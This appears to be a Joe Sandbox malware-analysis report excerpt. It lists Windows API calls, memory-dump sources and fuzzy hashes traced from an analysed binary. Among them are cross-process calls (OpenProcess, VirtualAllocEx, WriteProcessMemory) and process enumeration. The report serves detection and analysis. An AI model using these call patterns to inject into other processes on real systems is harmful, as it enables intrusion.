                                                                                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00751916
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00751922
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00751931
                                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00751938
                                                                                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0075194E
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00760B24,?,00763D41,?,00000001,00733AF4,?), ref: 00760CCB
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00760B24,?,00763D41,?,00000001,00733AF4,?), ref: 00760CD8
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00760B24,?,00763D41,?,00000001,00733AF4,?), ref: 00760CE5
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00760B24,?,00763D41,?,00000001,00733AF4,?), ref: 00760CF2
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00760B24,?,00763D41,?,00000001,00733AF4,?), ref: 00760CFF
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00760B24,?,00763D41,?,00000001,00733AF4,?), ref: 00760D0C
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 007565BF
                                                                                                                                                                                                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 007565D6
                                                                                                                                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 007565EE
                                                                                                                                                                                                                                                                              • KillTimer.USER32(?,0000040A), ref: 0075660A
                                                                                                                                                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 00756624
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0072262E
                                                                                                                                                                                                                                                                                • Part of subcall function 00722D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0072DB51,007C1DC4,00000000,007C1DC4,00000000,?,0072DB78,007C1DC4,00000007,007C1DC4,?,0072DF75,007C1DC4), ref: 00722D4E
                                                                                                                                                                                                                                                                                • Part of subcall function 00722D38: GetLastError.KERNEL32(007C1DC4,?,0072DB51,007C1DC4,00000000,007C1DC4,00000000,?,0072DB78,007C1DC4,00000007,007C1DC4,?,0072DF75,007C1DC4,007C1DC4), ref: 00722D60
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00722640
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00722653
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00722664
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00722675
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: __freea$_free
                                                                                                                                                                                                                                                                              • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 007641FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,007752EE,?,?,00000035,?), ref: 00764229
                                                                                                                                                                                                                                                                                • Part of subcall function 007641FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,007752EE,?,?,00000035,?), ref: 00764239
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 00775419
                                                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0077550E
                                                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 007755CD
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ErrorLastVariant$ClearFormatInitMessage
                                                                                                                                                                                                                                                                              • String ID: bnu
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 006FD253
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                              • String ID: t5|$t5|$t5|
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                                                              • String ID: CALLARGARRAY$bnu
                                                                                                                                                                                                                                                                              • API String ID: 157775604-129101640
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 0075BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00752B1D,?,?,00000034,00000800,?,00000034), ref: 0075BDF4
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 007530AD
                                                                                                                                                                                                                                                                                • Part of subcall function 0075BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00752B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 0075BDBF
                                                                                                                                                                                                                                                                                • Part of subcall function 0075BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 0075BD1C
                                                                                                                                                                                                                                                                                • Part of subcall function 0075BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00752AE1,00000034,?,?,00001004,00000000,00000000), ref: 0075BD2C
                                                                                                                                                                                                                                                                                • Part of subcall function 0075BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00752AE1,00000034,?,?,00001004,00000000,00000000), ref: 0075BD42
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0075311A
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00753167
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                                                              • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0075CBB1
                                                                                                                                                                                                                                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 0075CBF7
                                                                                                                                                                                                                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,007C29C0,00D00380), ref: 0075CC40
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                                                                              • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0078DCD0,00000000,?,?,?,?), ref: 00784F48
                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32 ref: 00784F65
                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00784F75
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$Long
                                                                                                                                                                                                                                                                              • String ID: SysTreeView32
                                                                                                                                                                                                                                                                              • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007849DC
                                                                                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007849F0
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00784A14
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$Window
                                                                                                                                                                                                                                                                              • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                              • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 007851A3
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 007851B1
                                                                                                                                                                                                                                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007851B8
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                                                              • String ID: msctls_updown32
                                                                                                                                                                                                                                                                              • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007842DC
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007842EC
                                                                                                                                                                                                                                                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00784312
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                              • String ID: Listbox
                                                                                                                                                                                                                                                                              • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0076544D
                                                                                                                                                                                                                                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007654A1
                                                                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,?,?,0078DCD0), ref: 00765515
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                              • String ID: %lu
                                                                                                                                                                                                                                                                              • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetActiveWindow.USER32 ref: 00788339
                                                                                                                                                                                                                                                                              • EnumChildWindows.USER32(?,0078802F,00000000), ref: 007883B0
                                                                                                                                                                                                                                                                                • Part of subcall function 006F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006F24B0
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$ActiveChildEnumLongWindows
                                                                                                                                                                                                                                                                              • String ID: (|$(|
                                                                                                                                                                                                                                                                              • API String ID: 3814560230-2718393683
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00784CED
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00784D02
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00784D0F
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                                                                                              • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                              • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F8577: _wcslen.LIBCMT ref: 006F858A
                                                                                                                                                                                                                                                                                • Part of subcall function 007536F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00753712
                                                                                                                                                                                                                                                                                • Part of subcall function 007536F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00753723
                                                                                                                                                                                                                                                                                • Part of subcall function 007536F4: GetCurrentThreadId.KERNEL32 ref: 0075372A
                                                                                                                                                                                                                                                                                • Part of subcall function 007536F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00753731
                                                                                                                                                                                                                                                                              • GetFocus.USER32 ref: 007538C4
                                                                                                                                                                                                                                                                                • Part of subcall function 0075373B: GetParent.USER32(00000000), ref: 00753746
                                                                                                                                                                                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0075390F
                                                                                                                                                                                                                                                                              • EnumChildWindows.USER32(?,00753987), ref: 00753937
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                              • String ID: %s%d
                                                                                                                                                                                                                                                                              • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 006F5A34
                                                                                                                                                                                                                                                                              • DestroyWindow.USER32(?,006F37B8,?,?,?,?,?,006F3709,?,?), ref: 006F5A91
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: DeleteDestroyObjectWindow
                                                                                                                                                                                                                                                                              • String ID: <)|$<)|
                                                                                                                                                                                                                                                                              • API String ID: 2587070983-4059746057
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00786360
                                                                                                                                                                                                                                                                              • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0078638D
                                                                                                                                                                                                                                                                              • DrawMenuBar.USER32(?), ref: 0078639C
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                                                                              • API String ID: 3227129158-4108050209
APIs
• GetForegroundWindow.USER32(?,007C28E0,0078AD55,000000FC,?,00000000,00000000,?), ref: 0078823F
• GetFocus.USER32 ref: 00788247
  • Part of subcall function 006F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006F24B0
  • Part of subcall function 006F2234: GetWindowLongW.USER32(?,000000EB), ref: 006F2242
• SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 007882B4
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
Similarity
• API ID: Window$Long$FocusForegroundMessageSend
• String ID: (|
• API String ID: 3601265619-3772712737
APIs
• DestroyAcceleratorTable.USER32(?), ref: 00788576
• CreateAcceleratorTableW.USER32(00000000,?,?,?,0076BE96,00000000,00000000,?,00000001,00000002), ref: 0078858C
• GetForegroundWindow.USER32(?,0076BE96,00000000,00000000,?,00000001,00000002), ref: 00788595
  • Part of subcall function 006F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006F24B0
Similarity
• API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
• String ID: (|
• API String ID: 986409557-3772712737
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007C4038,007C407C), ref: 00788C1A
• CloseHandle.KERNEL32 ref: 00788C2C
Similarity
• API ID: CloseCreateHandleProcess
• String ID: 8@|$|@|
• API String ID: 3712363035-4008437926
APIs
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00790BD4,?), ref: 00750EE0
                                                                                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00790BD4,?), ref: 00750EF8
                                                                                                                                                                                                                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,0078DCE0,000000FF,?,00000000,00000800,00000000,?,00790BD4,?), ref: 00750F1D
                                                                                                                                                                                                                                                                              • _memcmp.LIBVCRUNTIME ref: 00750F3E
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 314563124-0
                                                                                                                                                                                                                                                                              • Opcode ID: 3f8d97223b45119dd97344aee79d1cf995466dea98f5c5f258261e186e658503
                                                                                                                                                                                                                                                                              • Instruction ID: 3b4eabb954c6d808f954e6a676230ddc8f26171803654aaffc202ed513e7bc87
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f8d97223b45119dd97344aee79d1cf995466dea98f5c5f258261e186e658503
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2381FD75A00109EFCB14DF94C984DEEB7B9FF89315F204558F906AB250DB75AE09CBA0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0077B10C
                                                                                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0077B11A
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 0077B1FC
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0077B20B
                                                                                                                                                                                                                                                                                • Part of subcall function 0070E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00734D73,?), ref: 0070E395
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1991900642-0
                                                                                                                                                                                                                                                                              • Opcode ID: 6af8da45e5d38ae049da1cdf8d0a4fb342d13694423607fcc03884a87b8edea1
                                                                                                                                                                                                                                                                              • Instruction ID: b7f55fe315fa6dca84e202627f9027289e34ef93239fa777cf7499377811d03e
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6af8da45e5d38ae049da1cdf8d0a4fb342d13694423607fcc03884a87b8edea1
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78517B71908304AFD750EF24C886A6BBBE8FF89754F40891DF68997291EB74D904CB92
                                                                                                                                                                                                                                                                              APIs
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                                                                              • Opcode ID: 2286a83196e72e05397c4ba40f7c2937588e5a9a0f281b5b4d2a28e91bf28939
                                                                                                                                                                                                                                                                              • Instruction ID: 8d178cc6681fe20c618fd5ec3c65b257de70d35322e18b7c422b3836efa6b5ce
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2286a83196e72e05397c4ba40f7c2937588e5a9a0f281b5b4d2a28e91bf28939
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9412931A00110EBFB217ABD9C4AAFE3BA4EF41370F584635F818D62D3DA3D4C418666
